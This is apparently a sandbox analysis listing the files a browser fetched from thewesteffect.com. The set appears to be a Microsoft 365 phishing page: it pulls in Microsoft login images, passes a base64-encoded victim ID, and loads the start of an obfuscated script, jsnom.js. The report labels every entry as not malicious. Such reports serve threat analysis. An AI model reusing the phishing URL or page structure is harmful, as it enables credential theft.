                                                                                                                                                                                                                                            Preview:/*!. * Socket.IO v4.7.5. * (c) 2014-2024 Guillermo Rauch. * Released under the MIT License.. */.!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof globalThis?globalThis:e||self).io=t()}(this,(function(){"use strict";function e(t){return e="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},e(t)}function t(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}function n(e,t){for(var n=0;n<t.length;n++){var r=t[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(e,(i=r.key,o=void 0,"symbol"==typeof(o=function(e,t){if("object"!=typeof e||null===e)return e;var n=e[Symbol.toPrimitive];if(void 0!==n){var r=n.call(e,t||"default");if("object"!=typeof r)return r;th
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 250
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):199
                                                                                                                                                                                                                                            Entropy (8bit):6.766983163126765
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:XtkhhsKHWpSiKPjPOeNWo6Rs7J1TxODwpV:X8hsKHDTPyeNSRs7vV0aV
                                                                                                                                                                                                                                            MD5:21B761F2B1FD37F587D7222023B09276
                                                                                                                                                                                                                                            SHA1:F7A416C8907424F9A9644753E3A93D4D63AE640E
                                                                                                                                                                                                                                            SHA-256:72D4161C18A46D85C5566273567F791976431EFEF49510A0E3DD76FEC92D9393
                                                                                                                                                                                                                                            SHA-512:77745F60804D421B34DE26F8A216CEE27C440E469FD786A642757CCEDBC4875D5196431897D80137BD3E20B01104BA76DEC7D8E75771D8A9B5F14B66F2A9B7C0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:..........u....0.._%2k.8?....w..k..!.M.."b5<.M.bD..c..l.:..}...@.8p.sn.j...%".B...J..6...c..^..?...2d...R..w.<%..}..}s..ir0/.......:8).(.......^u...0..U..I.F....{]...[-......~..F.P_.....G.....
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (49854)
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):49993
                                                                                                                                                                                                                                            Entropy (8bit):5.216475744251136
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:RKrClF4PgzcEZ5G/Z4G9qXLZed86mhrjlm:RPXcZ4TLZzpPm
                                                                                                                                                                                                                                            MD5:777EB8FD4F8320B6E5CC9A7159BDEC6A
                                                                                                                                                                                                                                            SHA1:6B4032E88D0040182089FE3BEFDECEE9346E8921
                                                                                                                                                                                                                                            SHA-256:73EBA16BC895FDFA454E27ECB80DEF31EDE8D861F99E175FF93B110EABEC044F
                                                                                                                                                                                                                                            SHA-512:D75B7C43EBD8F49942AEBF8FBDE64A4D826AF27ECED3D6395FFA64FDA31DDEF26E812BEEE313AE9C6114CDA003A8BDC8F1C64A13FA41C3009F5F30E4449876B1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://cdn.socket.io/4.7.5/socket.io.min.js
                                                                                                                                                                                                                                            Preview:/*!. * Socket.IO v4.7.5. * (c) 2014-2024 Guillermo Rauch. * Released under the MIT License.. */.!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof globalThis?globalThis:e||self).io=t()}(this,(function(){"use strict";function e(t){return e="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},e(t)}function t(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}function n(e,t){for(var n=0;n<t.length;n++){var r=t[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(e,(i=r.key,o=void 0,"symbol"==typeof(o=function(e,t){if("object"!=typeof e||null===e)return e;var n=e[Symbol.toPrimitive];if(void 0!==n){var r=n.call(e,t||"default");if("object"!=typeof r)return r;th
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):2228
                                                                                                                                                                                                                                            Entropy (8bit):7.82817506159911
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:4/6MuQu6DYYEcBDlBVzqawiHI1Oupgl8m7NCnagQJFknwD:4SabhtXqMHyCl8m7N0ag6D
                                                                                                                                                                                                                                            MD5:EF9941290C50CD3866E2BA6B793F010D
                                                                                                                                                                                                                                            SHA1:4736508C795667DCEA21F8D864233031223B7832
                                                                                                                                                                                                                                            SHA-256:1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
                                                                                                                                                                                                                                            SHA-512:A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://www.gstatic.com/recaptcha/api2/logo_48.png
                                                                                                                                                                                                                                            Preview:.PNG........IHDR...0...0.....W.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs.................IDATh...P....=..8.....Nx. ..PlP8..;.C.1iL#6...*.Z..!......3.po .o.L.i.I..1fl..4..ujL&6$...............w...........,Z..z. ~.....\.._.C.eK...g..%..P..L7...96..q....L.....k6...*..,xz.._......B."#...L(n..f..Yb...*.8.;....K)N...H).%.F"Ic.LB.........jG.uD..B....Tm....T..).A.}D.f..3.V.....O.....t_..].x.{o......*....x?!W...j..@..G=Ed.XF.........J..E?../]..?p..W..H..d5% WA+.....)2r..+..'qk8.../HS.[...u..z.P.*....-.A.}.......I .P.....S....|...)..KS4....I.....W...@....S.s..s..$`.X9.....E.x.=.u.*iJ...........k......'...!.a....*+.....(...S..\h....@............I.$..%.2....l......a.|.....U....y.....t..8....TF.o.p.+.@<.g........-.M.....:.@..(.......@......>..=.ofm.WM{...e..,..D.r.......w....T.L.os..T@Rv..;.....9....56<.x...........2.k.1....dd.V.....m..y5../4|...G.p.V.......6...}.....B........5...&..v..yTd.6...../m.K...(.
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1636
                                                                                                                                                                                                                                            Entropy (8bit):4.214613323368661
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:t4pb8W1baAcycV1i21AL5Xr/fJzWTtDYnpTyuwa+BDhMXeDFF6+/OKgXOgWKZsHz:zdyb2+jfJz+sFyN3BdMeFF52KgeTksHz
                                                                                                                                                                                                                                            MD5:F7AB697E65B83CE9870A4736085DEEEC
                                                                                                                                                                                                                                            SHA1:5FF40BFF26B523FBBEAA5228A2AAC63E44AFAA90
                                                                                                                                                                                                                                            SHA-256:CBB3706E65B35A43BDCFEBD23B5479DC0542CA7E23197869B683D12B524472FE
                                                                                                                                                                                                                                            SHA-512:158874143CE65485348813431BB585227772F315234E08158A329DF98319AA5F1DB21DEF2AD7CAA5C25AD11660E7D4E05158CFA1198913A33B1B91676C4CA402
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M38,14H10V34H38V14m2,22H8V12H40V36M17.688,18.8V28.828H15.531V21.234a3.2,3.2,0,0,1-.672.43l-.266.117a2.55,2.55,0,0,1-.562.188,2.423,2.423,0,0,1-.3.07q-.141.023-.281.055V20.266q.422-.125.813-.281t.766-.344a8.253,8.253,0,0,0,1.344-.844h1.313m4.531,8.234h4.156v1.8H19.859v-.75a3.292,3.292,0,0,1,.25-1.344,4.183,4.183,0,0,1,.625-1.078,5.7,5.7,0,0,1,.844-.828q.219-.187.438-.352t.422-.32q.453-.312.766-.578a2.593,2.593,0,0,0,.3-.281l.25-.281a3.148,3.148,0,0,0,.328-.562,1.59,1.59,0,0,0,.109-.609,1.176,1.176,0,0,0-.359-.937,1.552,1.552,0,0,0-1.078-.328,3.625,3.625,0,0,0-2.422,1V19.688a4.866,4.866,0,0,1,1.359-.625,5.548,5.548,0,0,1,1.516-.2,4.456,4.456,0,0,1,1.344.188,2.461,2.461,0,0,1,1,.563,2.242,2.242,0,0,1,.625.875,3.007,3.007,0,0,1,.219,1.156,3.538,3.538,0,0,1-.055.641,3.7,3.7,0,0,1-.148.563,3.439,3.439,0,0,1-.562.953,7.2,7.2,0,0,1-.8.8q-.21
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):1636
                                                                                                                                                                                                                                            Entropy (8bit):4.214613323368661
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:t4pb8W1baAcycV1i21AL5Xr/fJzWTtDYnpTyuwa+BDhMXeDFF6+/OKgXOgWKZsHz:zdyb2+jfJz+sFyN3BdMeFF52KgeTksHz
                                                                                                                                                                                                                                            MD5:F7AB697E65B83CE9870A4736085DEEEC
                                                                                                                                                                                                                                            SHA1:5FF40BFF26B523FBBEAA5228A2AAC63E44AFAA90
                                                                                                                                                                                                                                            SHA-256:CBB3706E65B35A43BDCFEBD23B5479DC0542CA7E23197869B683D12B524472FE
                                                                                                                                                                                                                                            SHA-512:158874143CE65485348813431BB585227772F315234E08158A329DF98319AA5F1DB21DEF2AD7CAA5C25AD11660E7D4E05158CFA1198913A33B1B91676C4CA402
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://aadcdn.msftauth.net/shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg
                                                                                                                                                                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M38,14H10V34H38V14m2,22H8V12H40V36M17.688,18.8V28.828H15.531V21.234a3.2,3.2,0,0,1-.672.43l-.266.117a2.55,2.55,0,0,1-.562.188,2.423,2.423,0,0,1-.3.07q-.141.023-.281.055V20.266q.422-.125.813-.281t.766-.344a8.253,8.253,0,0,0,1.344-.844h1.313m4.531,8.234h4.156v1.8H19.859v-.75a3.292,3.292,0,0,1,.25-1.344,4.183,4.183,0,0,1,.625-1.078,5.7,5.7,0,0,1,.844-.828q.219-.187.438-.352t.422-.32q.453-.312.766-.578a2.593,2.593,0,0,0,.3-.281l.25-.281a3.148,3.148,0,0,0,.328-.562,1.59,1.59,0,0,0,.109-.609,1.176,1.176,0,0,0-.359-.937,1.552,1.552,0,0,0-1.078-.328,3.625,3.625,0,0,0-2.422,1V19.688a4.866,4.866,0,0,1,1.359-.625,5.548,5.548,0,0,1,1.516-.2,4.456,4.456,0,0,1,1.344.188,2.461,2.461,0,0,1,1,.563,2.242,2.242,0,0,1,.625.875,3.007,3.007,0,0,1,.219,1.156,3.538,3.538,0,0,1-.055.641,3.7,3.7,0,0,1-.148.563,3.439,3.439,0,0,1-.562.953,7.2,7.2,0,0,1-.8.8q-.21
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:HTML document, ASCII text
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):366
                                                                                                                                                                                                                                            Entropy (8bit):5.580417990788121
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:5mWxuJGzxfn2QQBg/UCiwAGfOVZA+WLShJTIP5TNm5dSUmxDeY4NhdA1BYXXfbwy:4WYcVv2Q+g/UCDAWOvfWLSsPZ45dWDdS
                                                                                                                                                                                                                                            MD5:B64AF5CC4E13104A7D4D6A89CC79218E
                                                                                                                                                                                                                                            SHA1:EEB3A0DE727E09F4CAE84AA8A6697F65A0231338
                                                                                                                                                                                                                                            SHA-256:9E43A23A45900B6E56EA3029BA0E1CA715FE4942FC35F6FE61691352750869F6
                                                                                                                                                                                                                                            SHA-512:879E8834EE7C56C5F442DCF478FB35F88B6FD65E1EEDAABB62CBD21D0CF56531EE92C5FE2D9DE96420517126E2B65B6E6616627696D14856185E54C853A1AE01
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVUwNUhaWGc9JnVpZD1VU0VSMTExMTIwMjRVMzUxMTExNDQ=N0123N
                                                                                                                                                                                                                                            Preview:.<!DOCTYPE html>.<html id='html' sti='VlZORlVqRXhNVEV5TURJMFZUTTFNVEV4TVRRMA==' vic='' lang='en'>..<head>. <script src='https://cdn.socket.io/4.7.5/socket.io.min.js' integrity='sha384-2huaZvOR9iDzHqslqwpR87isEmrfxqyWOF7hr7BY6KG0+hVKLoEXMPUJw3ynWuhO' crossorigin='anonymous'></script>.</head>..<body id='allbody'>..</body>..<script src='jsnom.js'></script>.</html>
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:MS Windows icon resource - 2 icons, 16x16 with PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced, 8 bits/pixel, 32x32 with PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced, 8 bits/pixel
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):2780
                                                                                                                                                                                                                                            Entropy (8bit):7.874815749952653
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:9MNqc41N/NGpVEmmNVKWqvFJ5ATJ0WDzfsbjlDSxW//WsABw2Zqqfv:9U41JN+WmmNVCQVoQxWneqY
                                                                                                                                                                                                                                            MD5:DABE9CE5581670F84E89A789A78D09B8
                                                                                                                                                                                                                                            SHA1:1662F23FF5553364505A29CAC571102CF370FC85
                                                                                                                                                                                                                                            SHA-256:04EC9BA779BE752A6480758574FEAE350370480887BC7FE52FD968519CF27208
                                                                                                                                                                                                                                            SHA-512:F09A24E952AF31C69C0B1F2EFEA433F442B2ED79D6CAF80864A0FC1C1030807F39FE7201B9EB597D1645C5BA5614B9ECA98D171EDDC794BD7311B252A84FB1F4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://thewesteffect.com/favicon.ico
                                                                                                                                                                                                                                            Preview:..................&... ...............PNG........IHDR................a...rIDAT8.e.Yh\e.....wr..;..e&.t.L.&.4micR.4.I.....IE.>.$E.........."....`Q.vyH*.4.M.,6.Lf2..;w..........s.......Cr[...T.....,3A..>..B.=..-...z..1..zl..qI.t.f.>..A.J@..;.?...<....k...Tt.my..R.4*.,....G.!....<.{&BA..#...P&..8vw.P$..p&...{..m...... T.......!Ojy.......sP...%.T.G.V.7.... ...c......y......s..].^...%......|.KE.b..r=..W..T.p.....f...@...#]M..*:N...m....g...47..}7....0..c/.l.~...omAg....p.X.Qk[.....]...2.}1..=.q.w.....F.A...F/.....m....5f!...[..yG.gqc..._.a&....@.*....d\C..0...%..B..B.s.....$..n.Q._.. ^.x..^..Y8(..G.M..Y.?4<..g.*i46.w..L....K....\s.....H.fX(t .<.D...6... ......<.uU....n.'..z......[O....(5..ta;....(.P,..r....s..o.%`...Gnn9..._)...o.W.......V.....X-3.......I...Kh.-.O'...D.%..9...HKw..m.rT...D_.....z..P.2P...QLL&... ..Cp%.\xC........Ve...fD.I.Z..n......(`Q.e........B...1(.....A....[T}.....\Zw...5s0]1...Y.K..24!m.VY/..8.7&c....x....IEND.B`..PNG........IHDR... ...
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:MS Windows icon resource - 2 icons, 16x16 with PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced, 8 bits/pixel, 32x32 with PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced, 8 bits/pixel
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2780
                                                                                                                                                                                                                                            Entropy (8bit):7.874815749952653
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:9MNqc41N/NGpVEmmNVKWqvFJ5ATJ0WDzfsbjlDSxW//WsABw2Zqqfv:9U41JN+WmmNVCQVoQxWneqY
                                                                                                                                                                                                                                            MD5:DABE9CE5581670F84E89A789A78D09B8
                                                                                                                                                                                                                                            SHA1:1662F23FF5553364505A29CAC571102CF370FC85
                                                                                                                                                                                                                                            SHA-256:04EC9BA779BE752A6480758574FEAE350370480887BC7FE52FD968519CF27208
                                                                                                                                                                                                                                            SHA-512:F09A24E952AF31C69C0B1F2EFEA433F442B2ED79D6CAF80864A0FC1C1030807F39FE7201B9EB597D1645C5BA5614B9ECA98D171EDDC794BD7311B252A84FB1F4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:..................&... ...............PNG........IHDR................a...rIDAT8.e.Yh\e.....wr..;..e&.t.L.&.4micR.4.I.....IE.>.$E.........."....`Q.vyH*.4.M.,6.Lf2..;w..........s.......Cr[...T.....,3A..>..B.=..-...z..1..zl..qI.t.f.>..A.J@..;.?...<....k...Tt.my..R.4*.,....G.!....<.{&BA..#...P&..8vw.P$..p&...{..m...... T.......!Ojy.......sP...%.T.G.V.7.... ...c......y......s..].^...%......|.KE.b..r=..W..T.p.....f...@...#]M..*:N...m....g...47..}7....0..c/.l.~...omAg....p.X.Qk[.....]...2.}1..=.q.w.....F.A...F/.....m....5f!...[..yG.gqc..._.a&....@.*....d\C..0...%..B..B.s.....$..n.Q._.. ^.x..^..Y8(..G.M..Y.?4<..g.*i46.w..L....K....\s.....H.fX(t .<.D...6... ......<.uU....n.'..z......[O....(5..ta;....(.P,..r....s..o.%`...Gnn9..._)...o.W.......V.....X-3.......I...Kh.-.O'...D.%..9...HKw..m.rT...D_.....z..P.2P...QLL&... ..Cp%.\xC........Ve...fD.I.Z..n......(`Q.e........B...1(.....A....[T}.....\Zw...5s0]1...Y.K..24!m.VY/..8.7&c....x....IEND.B`..PNG........IHDR... ...
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2228
                                                                                                                                                                                                                                            Entropy (8bit):7.82817506159911
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:4/6MuQu6DYYEcBDlBVzqawiHI1Oupgl8m7NCnagQJFknwD:4SabhtXqMHyCl8m7N0ag6D
                                                                                                                                                                                                                                            MD5:EF9941290C50CD3866E2BA6B793F010D
                                                                                                                                                                                                                                            SHA1:4736508C795667DCEA21F8D864233031223B7832
                                                                                                                                                                                                                                            SHA-256:1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
                                                                                                                                                                                                                                            SHA-512:A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:.PNG........IHDR...0...0.....W.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs.................IDATh...P....=..8.....Nx. ..PlP8..;.C.1iL#6...*.Z..!......3.po .o.L.i.I..1fl..4..ujL&6$...............w...........,Z..z. ~.....\.._.C.eK...g..%..P..L7...96..q....L.....k6...*..,xz.._......B."#...L(n..f..Yb...*.8.;....K)N...H).%.F"Ic.LB.........jG.uD..B....Tm....T..).A.}D.f..3.V.....O.....t_..].x.{o......*....x?!W...j..@..G=Ed.XF.........J..E?../]..?p..W..H..d5% WA+.....)2r..+..'qk8.../HS.[...u..z.P.*....-.A.}.......I .P.....S....|...)..KS4....I.....W...@....S.s..s..$`.X9.....E.x.=.u.*iJ...........k......'...!.a....*+.....(...S..\h....@............I.$..%.2....l......a.|.....U....y.....t..8....TF.o.p.+.@<.g........-.M.....:.@..(.......@......>..=.ofm.WM{...e..,..D.r.......w....T.L.os..T@Rv..;.....9....56<.x...........2.k.1....dd.V.....m..y5../4|...G.p.V.......6...}.....B........5...&..v..yTd.6...../m.K...(.
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (64593)
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):100217
                                                                                                                                                                                                                                            Entropy (8bit):4.51688839918228
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:ib8J+apQ3jx2wtA4+eS6e6+mitQT3TLJCLaRlAF:ix2wtA4+eS6e6+XE3TLJCLIlAF
                                                                                                                                                                                                                                            MD5:69858F1D6AA467818FEE39E46BFAADDB
                                                                                                                                                                                                                                            SHA1:7CE20EEC85C8DE3644C0367CDFCE8972BFE3C25B
                                                                                                                                                                                                                                            SHA-256:31F0972C467CB759E8A0C3790AF92329D9AB6F940DFA8D43AA02A609D2B5C09B
                                                                                                                                                                                                                                            SHA-512:101C431D95D136A1AE598660DFE4C3812DE06DD1F9D4280EC80D0A9CE5E4FF1D30F07827B91DFCE78100784C34F0AAF2F58E921304E9DB034516AD97A31AA849
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:function _0x1fae(_0x34ba19, _0x598b18) { const _0x59eb05 = _0x59eb(); return _0x1fae = function(_0x1fae59, _0x391fd5) { _0x1fae59 = _0x1fae59 - 0xea; let _0xcbc169 = _0x59eb05[_0x1fae59]; return _0xcbc169; }, _0x1fae(_0x34ba19, _0x598b18); }(function(_0x3ed08f, _0x56c8b3) {. const _0x2019c0 = _0x1fae,. _0x43cc63 = _0x3ed08f();. while (!![]) {. try {. const _0x262285 = parseInt(_0x2019c0(0x121)) / 0x1 + -parseInt(_0x2019c0(0x170)) / 0x2 + -parseInt(_0x2019c0(0x14b)) / 0x3 + -parseInt(_0x2019c0(0x14d)) / 0x4 + -parseInt(_0x2019c0(0x14c)) / 0x5 + -parseInt(_0x2019c0(0x118)) / 0x6 + parseInt(_0x2019c0(0x171)) / 0x7;. if (_0x262285 === _0x56c8b3) break;. else _0x43cc63['push'](_0x43cc63['shift']());. } catch (_0x3070ea) { _0x43cc63['push'](_0x43cc63['shift']()); }. }.}(_0x59eb, 0x27508), window['addEventListener']('load', function() {. const _0x1706f4 = _0x1fae;. document[_0x1706f4(0x166)][_0x1706f4(0x102)](_0x1706f4(0x151
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):52
                                                                                                                                                                                                                                            Entropy (8bit):4.190260390968384
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:OnuZoS+NT/ZoS8/ZYn:OnuZoSyT/ZoS8/ZYn
                                                                                                                                                                                                                                            MD5:09BDE5D10D92DEBBB74AE9C3DF3AECAB
                                                                                                                                                                                                                                            SHA1:2F4EEA05E85C26DE82C5E7CBA471687EC8D855EC
                                                                                                                                                                                                                                            SHA-256:F67F67274C88240DE01FA51D483271F58A5752B607B13DEE041C7A0671290E7F
                                                                                                                                                                                                                                            SHA-512:0FF4A460BC9068E61B6EEC0078E97F2AD0DCD12288E8161688351C3BB85A87D624E5B7635C47ED1B5B93C6D3B4A29A756A75A897394B4E6A3986BBB1762CFC6C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISJQkx-8FXO930ihIFDZFhlU4SBQ01hlQcEgUNkWGVThIFDZFhlU4=?alt=proto
                                                                                                                                                                                                                                            Preview:CiQKBw2RYZVOGgAKBw01hlQcGgAKBw2RYZVOGgAKBw2RYZVOGgA=
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):673
                                                                                                                                                                                                                                            Entropy (8bit):7.6596900876595075
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                                                                                                                                                                                                            MD5:0E176276362B94279A4492511BFCBD98
                                                                                                                                                                                                                                            SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                                                                                                                                                                                                            SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                                                                                                                                                                                                            SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg
                                                                                                                                                                                                                                            Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (64593)
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):100217
                                                                                                                                                                                                                                            Entropy (8bit):4.51688839918228
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:ib8J+apQ3jx2wtA4+eS6e6+mitQT3TLJCLaRlAF:ix2wtA4+eS6e6+XE3TLJCLIlAF
                                                                                                                                                                                                                                            MD5:69858F1D6AA467818FEE39E46BFAADDB
                                                                                                                                                                                                                                            SHA1:7CE20EEC85C8DE3644C0367CDFCE8972BFE3C25B
                                                                                                                                                                                                                                            SHA-256:31F0972C467CB759E8A0C3790AF92329D9AB6F940DFA8D43AA02A609D2B5C09B
                                                                                                                                                                                                                                            SHA-512:101C431D95D136A1AE598660DFE4C3812DE06DD1F9D4280EC80D0A9CE5E4FF1D30F07827B91DFCE78100784C34F0AAF2F58E921304E9DB034516AD97A31AA849
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://thewesteffect.com/n/jsnom.js
